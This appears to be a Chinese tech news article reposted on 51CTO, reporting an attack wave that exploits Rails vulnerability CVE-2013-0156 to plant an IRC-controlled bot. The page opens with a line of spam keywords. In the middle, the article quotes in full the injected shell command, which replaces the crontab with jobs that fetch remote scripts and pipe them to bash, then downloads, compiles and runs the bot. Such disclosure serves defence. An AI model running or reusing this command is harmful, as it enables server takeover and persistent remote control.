自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

Rails框架遭受持續(xù)不斷的攻擊波

開(kāi)發(fā) 前端
在過(guò)去的幾天里,攻擊者已經(jīng)越來(lái)越多地試圖通過(guò)一個(gè) Rails 框架的安全漏洞來(lái)攻陷服務(wù)器。成功的入侵者在服務(wù)器上安裝一個(gè)機(jī)器人,使其等到來(lái)自 IRC 頻道的進(jìn)一步指示。

在過(guò)去的幾天里,攻擊者已經(jīng)越來(lái)越多地試圖通過(guò)一個(gè) Rails 框架的安全漏洞來(lái)攻陷服務(wù)器。成功的入侵者在服務(wù)器上安裝一個(gè)機(jī)器人,使其等到來(lái)自 IRC 頻道的進(jìn)一步指示。

在安全專(zhuān)家 Jeff Jarmoc 的博客中寫(xiě)到,攻擊者是通過(guò) CVE 2013-0156 漏洞試圖攻擊的。盡管該漏洞已經(jīng)在1月份時(shí)關(guān)閉,但還有相當(dāng)多的服務(wù)器仍然運(yùn)行過(guò)時(shí)的 Ruby 版本。Jarmoc 稱(chēng)攻擊者嘗試注入如下命令:

crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k

這導(dǎo)致系統(tǒng)自動(dòng)下載 bot (k.c) 編譯然后執(zhí)行,Jarmoc 在其博客上也公布了該機(jī)器人程序的源碼。“k” 嘗試聯(lián)系位于 cvv4you.ru 域的 IRC 服務(wù)器,然后加入 #rails 頻道,在這里等待進(jìn)一步的攻擊指令。Jarmoc 稱(chēng) k 程序可通過(guò)指令下載并執(zhí)行任意代碼。目前該 IRC 服務(wù)器已經(jīng)能夠不可用,至少現(xiàn)在的地址是不可用的。

該機(jī)器人程序在進(jìn)程列表中顯示為 "- bash" ,啟動(dòng)時(shí)會(huì)同時(shí)創(chuàng)建一個(gè) /tmp/tan.pid 文件以確保同一時(shí)間只有一個(gè)進(jìn)程實(shí)例運(yùn)行。所有使用 Rails 框架的用戶(hù)應(yīng)該確認(rèn)正在使用當(dāng)前的 Rails 版本,當(dāng)前可靠的版本包括:3.2.13, 3.1.12 and 2.3.18.

英文原文: h-online

譯文鏈接:http://www.oschina.net/news/40942/attack-wave-on-ruby-on-rails

責(zé)任編輯:林師授 來(lái)源: OSCHINA編譯
相關(guān)推薦

2022-02-18 11:58:40

惡意電子郵件惡意軟件網(wǎng)絡(luò)攻擊

2012-08-13 09:33:53

2013-03-07 13:38:03

2022-02-16 14:38:52

勒索軟件攻擊

2012-11-01 14:02:04

2015-01-07 18:26:08

2013-03-21 09:24:28

2014-06-12 13:14:51

2022-04-26 10:04:56

VMware

2023-09-14 14:46:05

2020-11-25 15:44:02

網(wǎng)絡(luò)安全數(shù)字化轉(zhuǎn)型工具

2013-04-01 09:28:23

2022-09-01 13:48:52

網(wǎng)絡(luò)攻擊網(wǎng)絡(luò)安全

2018-04-25 08:09:20

2024-08-07 15:40:59

2010-02-01 10:40:58

2013-10-31 11:21:17

2024-03-12 14:46:26

2021-04-27 10:17:07

勒索軟件攻擊漏洞

2024-12-31 15:39:33

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)